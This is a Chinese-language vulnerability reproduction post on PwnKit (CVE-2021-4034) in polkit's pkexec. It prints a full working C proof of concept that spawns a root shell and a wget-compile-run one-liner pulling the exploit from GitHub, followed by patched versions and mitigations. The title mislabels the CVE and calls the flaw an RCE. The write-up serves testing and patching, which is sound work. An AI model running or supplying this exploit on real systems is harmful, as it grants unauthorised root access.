Polkit本地权限提升漏洞(CVE4034)复现
本文主要复现2022年1月出现的Polkit的RCE漏洞1.漏洞影响范围
绝大多数版本linux都在本次影响范围中漏洞检测方法: centos:rpm -qa |grep "polkit" ubuntu:dpkg -l policykit-12.漏洞影响前提条件有文件的执行权限有gcc编译(最好,没有也可以相同版本下自行编译)3. 漏洞复现3.1POC/* * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 */ #include #include #include char *shell = "#include " "#include " "#include " "void gconv() {} " "void gconv_init() { " " setuid(0); setgid(0); " " seteuid(0); setegid(0); " " system("export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf "GCONV_PATH=." "pwnkit"; /bin/sh"); " " exit(0); " "}"; int main(int argc, char *argv[]) { FILE *fp; system("mkdir -p "GCONV_PATH=."; touch "GCONV_PATH=./pwnkit"; chmod a+x "GCONV_PATH=./pwnkit""); system("mkdir -p pwnkit; echo "module UTF-8// PWNKIT// pwnkit 2" > pwnkit/gconv-modules"); fp = fopen("pwnkit/pwnkit.c", "w"); fprintf(fp, "%s", shell); fclose(fp); system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"); char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL }; execve("/usr/bin/pkexec", (char*[]){NULL}, env);
使用方法:gcc编译+执行即可3.2快捷的漏洞利用
直接执行wget https://ghproxy.com/https://raw.githubusercontent.com/arthepsy/CVE-2021-4034/main/cve-2021-4034-poc.c && gcc cve-2021-4034-poc.c -o cve-2021-4034-poc && ./cve-2021-4034-poc3.3漏洞结果
运行上述命令后如漏洞未修复便可直接获取root权限。
4.漏洞修复4.1修复版本
centos:CentOS 6:polkit-0.96-11.el6_10.2CentOS7:polkit-0.112-26.el7_9.1CentOS 8.0:polkit-0.115-13.el8_5.1CentOS 8.2:polkit-0.115-11.el8_2.2CentOS 8.4:polkit-0.115-11.el8_4.2
ubuntu:Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6Ubuntu 16.04 ESM:policykit-1 - 0.105-14.1ubuntu0.5+esm1Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1
4.2 修复方案4.2.1 参数限定
注:推荐该方案,这种方案下对业务的几乎没有影响 1、修改pkexec的权限:chmod 0755 /usr/bin/pkexec 2、如果pkexec非必要,可临时删除该可执行程序 4.2.2 版本升级
注意 :升级会导致docker、k8s之类的容器服务无法访问,需要在更新后进行重启。如有业务不能重启,建议选择参数限定的方式修复 升级完后需确保polkit升级到了安全版本,有些yum源的版本未更新到安全版本 centos:yum -y install polkit ubuntu:apt-get install policykit-1